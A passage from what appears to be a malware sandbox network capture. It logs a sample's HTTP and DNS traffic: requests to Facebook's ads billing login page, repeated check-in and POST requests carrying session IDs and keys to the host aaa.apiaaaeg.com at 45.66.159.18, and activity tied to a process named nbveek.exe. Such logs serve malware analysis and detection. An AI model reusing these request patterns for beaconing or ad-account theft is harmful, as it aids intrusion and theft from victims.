X-XSS-Protection: 0
X-Frame-Options: DENY
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: kIDahYkTmcKd/enSQbS6xoekCuJjpGb4Qu9p9MF0JZPPeno85v+Sfgvkit3gG7C7FuCkPeydRRJ/Cy5+UXhgHg==
Date: Sat, 31 Dec 2022 00:05:27 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 0
-
GEThttps://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingE5E8.exeRemote address:157.240.247.35:443RequestGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
Host: www.facebook.com
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-ch-prefers-color-scheme: light
Upgrade-Insecure-Requests: 1
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
ResponseHTTP/1.1 200 OK
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
x-fb-rlafr: 0
content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
cross-origin-opener-policy: same-origin-allow-popups
Pragma: no-cache
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
X-Frame-Options: DENY
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: r6rq05F/5x0tPsVodH1ehpb7CkXX+oJz7DRgj7oT8SWt2GnoQPOJjsYJcSWWXEI1Y/KXEXP7DICtzapUc7RZLg==
Date: Sat, 31 Dec 2022 00:05:28 GMT
Transfer-Encoding: chunked
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
-
Remote address:8.8.8.8:53Requestaaa.apiaaaeg.comIN AResponseaaa.apiaaaeg.comIN A45.66.159.18
-
Remote address:45.66.159.18:80RequestGET /check/safe HTTP/1.1
Connection: Keep-Alive
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42
Host: aaa.apiaaaeg.com
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:05:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.29
-
Remote address:45.66.159.18:80RequestPOST /check/?sid=106129&key=e1200dbbb37be638d594fb40984fb5c7 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42
Content-Length: 252
Host: aaa.apiaaaeg.com
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:05:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.29
-
Remote address:45.66.159.18:80RequestGET /check/safe HTTP/1.1
Connection: Keep-Alive
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42
Host: aaa.apiaaaeg.com
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:05:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.29
-
Remote address:45.66.159.18:80RequestPOST /check/?sid=106141&key=f2f97d5ca5337e374b368257576bb952 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42
Content-Length: 252
Host: aaa.apiaaaeg.com
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:05:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.29
-
Remote address:8.8.8.8:53Requestnav.smartscreen.microsoft.comIN AResponsenav.smartscreen.microsoft.comIN CNAMEwd-prod-ss.trafficmanager.netwd-prod-ss.trafficmanager.netIN CNAMEwd-prod-ss-eu-west-2-fe.westeurope.cloudapp.azure.comwd-prod-ss-eu-west-2-fe.westeurope.cloudapp.azure.comIN A20.86.249.62
-
Remote address:20.86.249.62:443RequestPOST /api/browser/edge/actions HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiaUpWYVBnT2orUXc9Iiwia2V5IjoidlZvRUdIOUU5djlKQ2EzTHFSR2JDdz09In0=
User-Agent: SmartScreen/281479409565696
Content-Length: 1272
Host: nav.smartscreen.microsoft.com
ResponseHTTP/1.1 200 OK
Content-Length: 3902
Content-Type: application/json; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
X-SmartScreen-Flight-Vector: EnableNsHumorMatch,enableProxyLeniency,IsArsFmsIntegrationEnabled,IsCurfId0LoggingEnabled,isCurfTstEnabled,isNpPIOverrideBlockEnabled,ListApiE5V2Enabled,npSettings2004,SendGeoMapInSettingsToNewAnaheimClient,SrcEOPEnabled,topTrafficV2Enabled,UpdateOnMissingEtagEnabled,updateSigningCert,updateSigningCertForRS3RS4
Date: Sat, 31 Dec 2022 00:05:34 GMT
Connection: close
-
Remote address:8.8.8.8:53Requestsmartscreen-prod.microsoft.comIN AResponsesmartscreen-prod.microsoft.comIN CNAMEwd-prod-ss.trafficmanager.netwd-prod-ss.trafficmanager.netIN CNAMEwd-prod-ss-eu-north-2-fe.northeurope.cloudapp.azure.comwd-prod-ss-eu-north-2-fe.northeurope.cloudapp.azure.comIN A20.82.250.189
-
GEThttps://smartscreen-prod.microsoft.com/windows/browser/edge/data/toptraffic?pushCert=false&os=10.0.19041.1288.vb_release&flight=%7B%22ETag%22%3A%22%5C%22f1N%2BZtS%2B4zEcF5jUnfkfY83au2YpaEz3mRg50jHrtzo%3D%5C%22%22%2C%22Ids%22%3A%5B%22P-R-1021007-4-5%2CP-R-99770-9-32%2CP-R-86682-4-37%2CP-R-73000-7-30%2CP-R-72999-7-29%2CP-R-70204-3-18%2CP-R-69385-1-5%2CP-R-68026-3-37%2CP-R-68490-1-3%2CP-R-68172-2-4%2CP-R-68175-1-6%2CP-R-68176-2-8%2CP-R-68179-1-3%2CP-R-68306-1-20%2CP-R-68307-1-3%2CP-D-68194-1-2%22%5D%2C%22Settings%22%3A%7B%22Names%22%3Anull%2C%22Ring%22%3A0%2C%22Models%22%3Anull%2C%22ServiceClientModelDetonate%22%3Afalse%2C%22WdsiFeedback%22%3Afalse%2C%22NPFeedbackUriOverride%22%3Anull%2C%22NetworkFilterDetonate%22%3Afalse%2C%22ServicePhishDetonate%22%3Afalse%2C%22ServicePhishDetonateLegacy%22%3Afalse%2C%22ServiceAdhocDetonate%22%3Afalse%2C%22NpSettings2004%22%3Atrue%2C%22UpdateSigningCert%22%3Atrue%2C%22UpdateSigningCertForRS3RS4%22%3Atrue%2C%22NpSettings2004Value%22%3A0%2C%22IsCOCOBlockEnabled%22%3Afalse%2C%22NpIpBlockOverrideValue%22%3A0%2C%22TopTrafficV2Enabled%22%3Atrue%2C%22ListApiE5V2Enabled%22%3Atrue%2C%22IsNpPIOverrideBlockEnabled%22%3Atrue%2C%22TopTrafficV2MobileFlightEnabled%22%3Afalse%2C%22BloomFilterDeltaFlag%22%3A1%2C%22SrcEOPEnabled%22%3Atrue%2C%22IsCurfId0LoggingEnabled%22%3Atrue%2C%22IsCurfId0BlockingEnabled%22%3Afalse%2C%22UpdateOnMissingEtagEnabled%22%3Atrue%2C%22EnableProxyLeniency%22%3Atrue%2C%22IsArsFmsIntegrationEnabled%22%3Atrue%2C%22EnableNsHumorMatch%22%3Atrue%2C%22ApplyNsHumorVerdict%22%3Afalse%2C%22EnableNpSkipNonWeb%22%3Afalse%2C%22SendGeoMapInSettingsToNewAnaheimClient%22%3Atrue%2C%22UmsSrcPhishBNRTEnabled%22%3Afalse%2C%22MTDThrottleFactor%22%3A0.0%2C%22UnsilenceModelGuid%22%3Anull%7D%7Dmsedge.exeRemote address:20.82.250.189:443RequestGET /windows/browser/edge/data/toptraffic?pushCert=false&os=10.0.19041.1288.vb_release&flight=%7B%22ETag%22%3A%22%5C%22f1N%2BZtS%2B4zEcF5jUnfkfY83au2YpaEz3mRg50jHrtzo%3D%5C%22%22%2C%22Ids%22%3A%5B%22P-R-1021007-4-5%2CP-R-99770-9-32%2CP-R-86682-4-37%2CP-R-73000-7-30%2CP-R-72999-7-29%2CP-R-70204-3-18%2CP-R-69385-1-5%2CP-R-68026-3-37%2CP-R-68490-1-3%2CP-R-68172-2-4%2CP-R-68175-1-6%2CP-R-68176-2-8%2CP-R-68179-1-3%2CP-R-68306-1-20%2CP-R-68307-1-3%2CP-D-68194-1-2%22%5D%2C%22Settings%22%3A%7B%22Names%22%3Anull%2C%22Ring%22%3A0%2C%22Models%22%3Anull%2C%22ServiceClientModelDetonate%22%3Afalse%2C%22WdsiFeedback%22%3Afalse%2C%22NPFeedbackUriOverride%22%3Anull%2C%22NetworkFilterDetonate%22%3Afalse%2C%22ServicePhishDetonate%22%3Afalse%2C%22ServicePhishDetonateLegacy%22%3Afalse%2C%22ServiceAdhocDetonate%22%3Afalse%2C%22NpSettings2004%22%3Atrue%2C%22UpdateSigningCert%22%3Atrue%2C%22UpdateSigningCertForRS3RS4%22%3Atrue%2C%22NpSettings2004Value%22%3A0%2C%22IsCOCOBlockEnabled%22%3Afalse%2C%22NpIpBlockOverrideValue%22%3A0%2C%22TopTrafficV2Enabled%22%3Atrue%2C%22ListApiE5V2Enabled%22%3Atrue%2C%22IsNpPIOverrideBlockEnabled%22%3Atrue%2C%22TopTrafficV2MobileFlightEnabled%22%3Afalse%2C%22BloomFilterDeltaFlag%22%3A1%2C%22SrcEOPEnabled%22%3Atrue%2C%22IsCurfId0LoggingEnabled%22%3Atrue%2C%22IsCurfId0BlockingEnabled%22%3Afalse%2C%22UpdateOnMissingEtagEnabled%22%3Atrue%2C%22EnableProxyLeniency%22%3Atrue%2C%22IsArsFmsIntegrationEnabled%22%3Atrue%2C%22EnableNsHumorMatch%22%3Atrue%2C%22ApplyNsHumorVerdict%22%3Afalse%2C%22EnableNpSkipNonWeb%22%3Afalse%2C%22SendGeoMapInSettingsToNewAnaheimClient%22%3Atrue%2C%22UmsSrcPhishBNRTEnabled%22%3Afalse%2C%22MTDThrottleFactor%22%3A0.0%2C%22UnsilenceModelGuid%22%3Anull%7D%7D HTTP/1.1
Connection: Keep-Alive
Accept: application/x-patch-bsdiff, application/octet-stream
Authorization: SmartScreenPlain eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQifQ==
If-None-Match: "170540185939602997400506234197983529371"
User-Agent: SmartScreen/281479409565696
Host: smartscreen-prod.microsoft.com
ResponseHTTP/1.1 200 OK
Content-Length: 460992
Content-Type: application/octet-stream
ETag: "638004170464094982"
Server: Microsoft-HTTPAPI/2.0
X-SmartScreen-Flight-Vector: EnableNsHumorMatch,EnableProxyLeniency,IsArsFmsIntegrationEnabled,IsCurfId0LoggingEnabled,IsNpPIOverrideBlockEnabled,ListApiE5V2Enabled,NpSettings2004,SendGeoMapInSettingsToNewAnaheimClient,SrcEOPEnabled,TopTrafficV2Enabled,UpdateOnMissingEtagEnabled,UpdateSigningCert,UpdateSigningCertForRS3RS4
Date: Sat, 31 Dec 2022 00:05:34 GMT
Connection: close
-
GEThttps://smartscreen-prod.microsoft.com/windows/browser/edge/data/bloomfilter/x?pushCert=false&flight=%7B%22ETag%22%3A%22%5C%22f1N%2BZtS%2B4zEcF5jUnfkfY83au2YpaEz3mRg50jHrtzo%3D%5C%22%22%2C%22Ids%22%3A%5B%22P-R-1021007-4-5%2CP-R-99770-9-32%2CP-R-86682-4-37%2CP-R-73000-7-30%2CP-R-72999-7-29%2CP-R-70204-3-18%2CP-R-69385-1-5%2CP-R-68026-3-37%2CP-R-68490-1-3%2CP-R-68172-2-4%2CP-R-68175-1-6%2CP-R-68176-2-8%2CP-R-68179-1-3%2CP-R-68306-1-20%2CP-R-68307-1-3%2CP-D-68194-1-2%22%5D%2C%22Settings%22%3A%7B%22Names%22%3Anull%2C%22Ring%22%3A0%2C%22Models%22%3Anull%2C%22ServiceClientModelDetonate%22%3Afalse%2C%22WdsiFeedback%22%3Afalse%2C%22NPFeedbackUriOverride%22%3Anull%2C%22NetworkFilterDetonate%22%3Afalse%2C%22ServicePhishDetonate%22%3Afalse%2C%22ServicePhishDetonateLegacy%22%3Afalse%2C%22ServiceAdhocDetonate%22%3Afalse%2C%22NpSettings2004%22%3Atrue%2C%22UpdateSigningCert%22%3Atrue%2C%22UpdateSigningCertForRS3RS4%22%3Atrue%2C%22NpSettings2004Value%22%3A0%2C%22IsCOCOBlockEnabled%22%3Afalse%2C%22NpIpBlockOverrideValue%22%3A0%2C%22TopTrafficV2Enabled%22%3Atrue%2C%22ListApiE5V2Enabled%22%3Atrue%2C%22IsNpPIOverrideBlockEnabled%22%3Atrue%2C%22TopTrafficV2MobileFlightEnabled%22%3Afalse%2C%22BloomFilterDeltaFlag%22%3A1%2C%22SrcEOPEnabled%22%3Atrue%2C%22IsCurfId0LoggingEnabled%22%3Atrue%2C%22IsCurfId0BlockingEnabled%22%3Afalse%2C%22UpdateOnMissingEtagEnabled%22%3Atrue%2C%22EnableProxyLeniency%22%3Atrue%2C%22IsArsFmsIntegrationEnabled%22%3Atrue%2C%22EnableNsHumorMatch%22%3Atrue%2C%22ApplyNsHumorVerdict%22%3Afalse%2C%22EnableNpSkipNonWeb%22%3Afalse%2C%22SendGeoMapInSettingsToNewAnaheimClient%22%3Atrue%2C%22UmsSrcPhishBNRTEnabled%22%3Afalse%2C%22MTDThrottleFactor%22%3A0.0%2C%22UnsilenceModelGuid%22%3Anull%7D%7D&os=10.0.19041.1288.vb_releasemsedge.exeRemote address:20.82.250.189:443RequestGET /windows/browser/edge/data/bloomfilter/x?pushCert=false&flight=%7B%22ETag%22%3A%22%5C%22f1N%2BZtS%2B4zEcF5jUnfkfY83au2YpaEz3mRg50jHrtzo%3D%5C%22%22%2C%22Ids%22%3A%5B%22P-R-1021007-4-5%2CP-R-99770-9-32%2CP-R-86682-4-37%2CP-R-73000-7-30%2CP-R-72999-7-29%2CP-R-70204-3-18%2CP-R-69385-1-5%2CP-R-68026-3-37%2CP-R-68490-1-3%2CP-R-68172-2-4%2CP-R-68175-1-6%2CP-R-68176-2-8%2CP-R-68179-1-3%2CP-R-68306-1-20%2CP-R-68307-1-3%2CP-D-68194-1-2%22%5D%2C%22Settings%22%3A%7B%22Names%22%3Anull%2C%22Ring%22%3A0%2C%22Models%22%3Anull%2C%22ServiceClientModelDetonate%22%3Afalse%2C%22WdsiFeedback%22%3Afalse%2C%22NPFeedbackUriOverride%22%3Anull%2C%22NetworkFilterDetonate%22%3Afalse%2C%22ServicePhishDetonate%22%3Afalse%2C%22ServicePhishDetonateLegacy%22%3Afalse%2C%22ServiceAdhocDetonate%22%3Afalse%2C%22NpSettings2004%22%3Atrue%2C%22UpdateSigningCert%22%3Atrue%2C%22UpdateSigningCertForRS3RS4%22%3Atrue%2C%22NpSettings2004Value%22%3A0%2C%22IsCOCOBlockEnabled%22%3Afalse%2C%22NpIpBlockOverrideValue%22%3A0%2C%22TopTrafficV2Enabled%22%3Atrue%2C%22ListApiE5V2Enabled%22%3Atrue%2C%22IsNpPIOverrideBlockEnabled%22%3Atrue%2C%22TopTrafficV2MobileFlightEnabled%22%3Afalse%2C%22BloomFilterDeltaFlag%22%3A1%2C%22SrcEOPEnabled%22%3Atrue%2C%22IsCurfId0LoggingEnabled%22%3Atrue%2C%22IsCurfId0BlockingEnabled%22%3Afalse%2C%22UpdateOnMissingEtagEnabled%22%3Atrue%2C%22EnableProxyLeniency%22%3Atrue%2C%22IsArsFmsIntegrationEnabled%22%3Atrue%2C%22EnableNsHumorMatch%22%3Atrue%2C%22ApplyNsHumorVerdict%22%3Afalse%2C%22EnableNpSkipNonWeb%22%3Afalse%2C%22SendGeoMapInSettingsToNewAnaheimClient%22%3Atrue%2C%22UmsSrcPhishBNRTEnabled%22%3Afalse%2C%22MTDThrottleFactor%22%3A0.0%2C%22UnsilenceModelGuid%22%3Anull%7D%7D&os=10.0.19041.1288.vb_release HTTP/1.1
Connection: Keep-Alive
Accept: application/x-patch-bsdiff, application/octet-stream
Authorization: SmartScreenPlain eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQifQ==
If-None-Match: "636976985063396749.rel.v2"
User-Agent: SmartScreen/281479409565696
Host: smartscreen-prod.microsoft.com
ResponseHTTP/1.1 200 OK
Content-Length: 3774
Content-Type: application/octet-stream
ETag: "638080385188407074"
Server: Microsoft-HTTPAPI/2.0
X-SmartScreen-Flight-Vector: EnableNsHumorMatch,EnableProxyLeniency,IsArsFmsIntegrationEnabled,IsCurfId0LoggingEnabled,IsNpPIOverrideBlockEnabled,ListApiE5V2Enabled,NpSettings2004,SendGeoMapInSettingsToNewAnaheimClient,SrcEOPEnabled,TopTrafficV2Enabled,UpdateOnMissingEtagEnabled,UpdateSigningCert,UpdateSigningCertForRS3RS4
Date: Sat, 31 Dec 2022 00:05:34 GMT
Connection: close
-
Remote address:20.82.250.189:443RequestPOST /api/browser/edge/data/settings HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json; charset=utf-8
Accept: application/x-patch-bsdiff, application/octet-stream
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiaUpWYVBnT2orUXc9Iiwia2V5IjoidlZvRUdIOUU5djlKQ2EzTHFSR2JDdz09In0=
If-None-Match: "2.0-0"
User-Agent: SmartScreen/281479409565696
Content-Length: 1272
Host: smartscreen-prod.microsoft.com
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
ETag: "2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1"
Server: Microsoft-HTTPAPI/2.0
X-SmartScreen-Flight-Vector: EnableNsHumorMatch,enableProxyLeniency,IsArsFmsIntegrationEnabled,IsCurfId0LoggingEnabled,isCurfTstEnabled,isNpPIOverrideBlockEnabled,ListApiE5V2Enabled,npSettings2004,SendGeoMapInSettingsToNewAnaheimClient,SrcEOPEnabled,topTrafficV2Enabled,UpdateOnMissingEtagEnabled,updateSigningCert,updateSigningCertForRS3RS4
Date: Sat, 31 Dec 2022 00:05:35 GMT
Connection: close
-
Remote address:20.86.249.62:443RequestPOST /api/browser/edge/actions HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiNXV3a2pIRGd1TE09Iiwia2V5IjoiVHdvb2EwSGZLZFJJKzVwcjhmbmVZdz09In0=
User-Agent: SmartScreen/281479409565696
Content-Length: 1272
Host: nav.smartscreen.microsoft.com
ResponseHTTP/1.1 200 OK
Content-Length: 3902
Content-Type: application/json; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
X-SmartScreen-Flight-Vector: EnableNsHumorMatch,enableProxyLeniency,IsArsFmsIntegrationEnabled,IsCurfId0LoggingEnabled,isCurfTstEnabled,isNpPIOverrideBlockEnabled,ListApiE5V2Enabled,npSettings2004,SendGeoMapInSettingsToNewAnaheimClient,SrcEOPEnabled,topTrafficV2Enabled,UpdateOnMissingEtagEnabled,updateSigningCert,updateSigningCertForRS3RS4
Date: Sat, 31 Dec 2022 00:05:35 GMT
Connection: close
-
Remote address:8.8.8.8:53Requestlearn.microsoft.comIN AResponselearn.microsoft.comIN CNAMElearn-public.trafficmanager.netlearn-public.trafficmanager.netIN CNAMElearn.microsoft.com.edgekey.netlearn.microsoft.com.edgekey.netIN CNAMElearn.microsoft.com.edgekey.net.globalredir.akadns.netlearn.microsoft.com.edgekey.net.globalredir.akadns.netIN CNAMEe13636.dscb.akamaiedge.nete13636.dscb.akamaiedge.netIN A104.73.152.149
-
GEThttps://learn.microsoft.com/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0msedge.exeRemote address:104.73.152.149:443RequestGET /dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP/2.0
host: learn.microsoft.com
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 301
request-context: appId=cid-v1:b1c5b6ea-7ff0-41d3-9862-84c5e1dc3be7
x-datacenter: wus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains; preload
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 00HyvYwAAAACmGNlIxGu0RIPcCfZC16NEQU1TMDRFREdFMTkxNgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
content-length: 0
cache-control: no-cache, no-store
expires: Sat, 31 Dec 2022 00:05:36 GMT
date: Sat, 31 Dec 2022 00:05:36 GMT
set-cookie: ARRAffinity=46ff90d79af9c81ac17c3dd6864fed4541e4aefa9dadde54d054f9f68affb669;Path=/;HttpOnly;Secure;Domain=learn.microsoft.com
set-cookie: ARRAffinitySameSite=46ff90d79af9c81ac17c3dd6864fed4541e4aefa9dadde54d054f9f68affb669;Path=/;HttpOnly;SameSite=None;Secure;Domain=learn.microsoft.com
set-cookie: original_req_url=https://learn.microsoft.com/dotnet/framework/install/application-not-started; expires=Sat, 31-Dec-2022 00:05:41 GMT; secure; HttpOnly; SameSite=Lax
akamai-cache-status: Miss from child, Miss from parent
-
GEThttps://learn.microsoft.com/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0msedge.exeRemote address:104.73.152.149:443RequestGET /dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP/2.0
host: learn.microsoft.com
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 301
request-context: appId=cid-v1:b1c5b6ea-7ff0-41d3-9862-84c5e1dc3be7
x-datacenter: wus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains; preload
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 00HyvYwAAAADS1d9ZNDNySbD3+/yXa5GtQU1TMDRFREdFMTkxMQA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
content-length: 0
cache-control: no-cache, no-store
expires: Sat, 31 Dec 2022 00:05:36 GMT
date: Sat, 31 Dec 2022 00:05:36 GMT
set-cookie: ARRAffinity=224790e11ccad0c1475003f020197e715956166454c09d097e709fb76fdb8a84;Path=/;HttpOnly;Secure;Domain=learn.microsoft.com
set-cookie: ARRAffinitySameSite=224790e11ccad0c1475003f020197e715956166454c09d097e709fb76fdb8a84;Path=/;HttpOnly;SameSite=None;Secure;Domain=learn.microsoft.com
set-cookie: original_req_url=https://learn.microsoft.com/dotnet/framework/install/application-not-started; expires=Sat, 31-Dec-2022 00:05:41 GMT; secure; HttpOnly; SameSite=Lax
akamai-cache-status: Miss from child, Miss from parent
-
GEThttps://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0msedge.exeRemote address:104.73.152.149:443RequestGET /en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP/2.0
host: learn.microsoft.com
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
